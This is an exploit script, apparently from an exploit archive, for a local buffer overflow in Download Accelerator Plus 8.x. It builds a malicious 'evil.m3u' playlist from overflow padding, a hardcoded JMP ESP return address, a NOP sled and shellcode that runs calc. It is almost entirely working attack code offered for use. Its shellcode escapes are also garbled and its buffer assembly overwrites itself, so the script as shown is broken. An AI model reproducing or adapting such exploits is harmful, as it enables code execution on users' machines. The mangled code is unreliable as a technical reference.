Download Accelerator Plus - DAP 8.x (m3u) Local BOF Exploit 0day

#!/usr/bin/python

# Download Accelerator Plus - DAP 8.x (m3u) 0day Local Buffer Overflow Exploit

# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>

# Tested on: Download Accelerator Plus 8.6 / XP SP2 Polish

# Shellcode: Windows Execute Command (calc)

# Just for fun ;]

from struct import pack

shellcode = (

"x6ax22x59xd9xeexd9x74x24xf4x5bx81x73x13x8dx6cxf6"

"xb2x83xebxfcxe2xf4x71x84xb2xb2x8dx6cx7dxf7xb1xe7"

"x8axb7xf5x6dx19x39xc2x74x7dxedxadx6dx1dxfbx06x58"

"x7dxb3x63x5dx36x2bx21xe8x36xc6x8axadx3cxbfx8cxae"

"x1dx46xb6x38xd2xb6xf8x89x7dxedxa9x6dx1dxd4x06x60"

"xbdx39xd2x70xf7x59x06x70x7dxb3x66xe5xaax96x89xaf"

"xc7x72xe9xe7xb6x82x08xacx8exbex06x2cxfax39xfdx70"

"x5bx39xe5x64x1dxbbx06xecx46xb2x8dx6cx7dxdaxb1x33"

"xc7x44xedx3ax7fx4ax0exacx8dxe2xe5x9cx7cxb6xd2x04"

"x6ex4cx07x62xa1x4dx6ax0fx97xdexeex6cxf6xb2")

RET = 0x7CA58265 # JMP ESP (SHELL32.DLL / XP SP2 Polish)

m3u = 'http://localhost/verify_me________________________________%s.mp3'

buf = 'A' * 14074

buf = pack('<L', RET)

buf = 'x90' * 32

buf = shellcode

m3u %= buf

fd = open('evil.m3u', 'wb')

fd.write(m3u)

fd.close()

print 'DONE, import the evil.m3u and click "Verify"'

# EoF